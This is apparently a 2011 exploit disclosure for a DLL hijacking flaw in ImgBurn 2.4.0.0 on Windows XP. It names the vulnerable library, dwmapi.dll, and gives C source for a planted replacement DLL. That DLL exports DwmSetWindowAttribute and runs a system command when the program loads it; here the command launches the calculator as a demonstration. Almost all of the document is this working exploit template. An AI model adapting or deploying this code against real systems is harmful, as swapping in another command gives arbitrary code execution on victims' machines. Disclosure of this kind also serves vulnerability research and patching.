############################################# ImgBurn 2.4.0.0 dll hijack vulnerability date : 2\1\2011 software : http://www.imgburn.com author : d3c0der - d3c0der@hotmail.com website : www.attackerz.ir Operating System: Windows XP (Version 5.1 Service Pack 3) Application: ImgBurn.exe Vulnerable dll : dwmapi.dll ############################################# #include <windows.h> #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int egg() { system ("calc"); exit(0); return 0; } ##############################################